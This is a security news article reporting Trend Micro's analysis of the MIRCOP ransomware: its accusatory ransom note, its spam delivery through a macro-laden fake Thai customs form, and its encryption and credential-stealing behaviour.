Security Experts:

MIRCOP Ransomware Claims to be Victim, Demands Payback

Ransomware authors use various techniques to encourage victims to pay a ransom, and the actors behind a new threat called MIRCOP are employing an unusual one: the ransom note claims that the victim stole 48.48 Bitcoins. 

What’s more, the ransom note displays a hooded figure in a Guy Fawkes mask, which has been long associated with notorious hacktivist group Anonymous, and offers little instruction on how the victim should pay the ransom. Instead, it suggests that the victim knows how to return the money and that they know who to send the ransom demand to.

At 48.48 Bitcoins, the ransom amounts to around $30,000, one of highest seen, but the ransom note threatens that further action will be taken if the victim doesn’t pay, researchers at Trend Micro reveal. The ransom note, however, does mention a Bitcoin address, although it doesn’t offer details on how victims can make crypto-currency transactions. However, no payment has been made to the mentioned address as of now.

The MIRCOP ransomware is distributed as a malicious document in spam emails, supposedly representing a Thai customs form used when importing or exporting goods. The document requests users to enable macros to be able to sign it, but instead abuses Windows PowerShell to download and execute the malicious payload.

MIRCOP drops three files in the %Temp% folder: c.exe (a routine that steals information), and x.exe and y.exe (both used to encrypt files). The new threat doesn’t append encrypted files with an extension, as other ransomware families out there do, but prepends files with the string “Lock.” And also encrypts common folders.

In addition to encrypting files on the infected machine, MIRCOP can steal credentials from various applications, including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype, researchers discovered. In this regard, MIRCOP is not the first ransomware to pack info-stealing capabilities, given that CryptXXX has had the feature for over two months now.

“Social engineering in the form of spam can lead to infection, especially when the malware employs underhanded tactics such as macro malware leveraging on PowerShell in attached files. Users should be careful when receiving mail from unknown sources and should refrain from downloading and opening their attachments if any,” Trend Micro researchers note.

Since the beginning of this year, ransomware has emerged as a prevalent threat, and a recent report from Kaspersky revealed that the number of users attacked with cryptoware increased 5.5 times over the past couple of years. At the moment, Locky appears to be the top ransomware out there, courtesy of massive infection campaigns powered by the Necurs botnet.

Related: Bart Ransomware Doesn't Require C&C Server to Encrypt Files

view counter